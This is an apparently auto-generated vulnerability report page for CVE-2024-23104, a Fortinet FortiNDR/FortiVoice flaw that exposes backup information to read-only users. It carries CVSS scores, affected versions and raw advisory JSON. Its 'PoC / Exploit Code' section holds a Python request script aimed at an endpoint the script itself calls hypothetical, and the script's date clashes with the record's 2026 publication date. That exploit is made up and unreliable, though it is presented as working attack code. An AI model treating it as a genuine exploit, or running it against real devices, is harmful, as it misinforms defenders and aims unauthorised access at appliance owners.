Security Vulnerability Report
CVE-2024-23104 CVSS 5.4 MEDIUM

CVE-2024-23104

Published: 2026-04-14 16:16:29
Last Modified: 2026-04-20 18:03:06

Description

An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, and FortiVoice 7.0.0 through 7.0.1 may allow a remote authenticated attacker with at least read-only permission on system maintenance to access backup information via crafted HTTP requests.

Weakness: CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

The record also carries a second (Primary) CVSS 3.1 assessment of 4.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N), which rates the integrity impact as None; the 5.4 score above is the Secondary assessment.

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortindr:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortindr:7.6.0:*:*:*:*:*:*:* - VULNERABLE
FortiNDR 7.6.0
FortiNDR 7.4.0 - 7.4.8
FortiNDR 7.2 (all versions)
FortiNDR 7.1 (all versions)
FortiNDR 7.0 (all versions)
FortiVoice 7.0.0 - 7.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: Fortinet FortiNDR/FortiVoice Backup Information Disclosure
# Date: 2024-04-14
# Exploit Author: Analyst
# Vendor Homepage: https://www.fortinet.com/
# Version: FortiNDR 7.0-7.6, FortiVoice 7.0-7.0.1

# Target URL
target_url = "https://<target_ip>/api/backup"  # Hypothetical endpoint based on description

# Headers (Authentication token required)
headers = {
    "Authorization": "Bearer <read_only_token>",
    "User-Agent": "Mozilla/5.0",
}

try:
    # Send crafted HTTP request to access backup info
    response = requests.get(target_url, headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] Exploit successful! Backup data accessed.")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-124 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2024-23104",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T16:16:28.723",
    "lastModified": "2026-04-20T18:03:06.263",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, FortiVoice 7.0.0 through 7.0.1 may allow a remote authenticated attacker with at least read-only permission on system maintenance to access backup information via crafted HTTP requests"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-200"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.0.2",
                "matchCriteriaId": "5F6B6495-7CF4-4E5A-8497-9AF6D81C083B"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortindr:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.4.9",
                "matchCriteriaId": "63871F8B-0798-4615-9781-9C7FA68C30AF"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortindr:7.6.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "9A1D8AE9-D9F9-402C-B8EB-58189200E0D6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-124",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```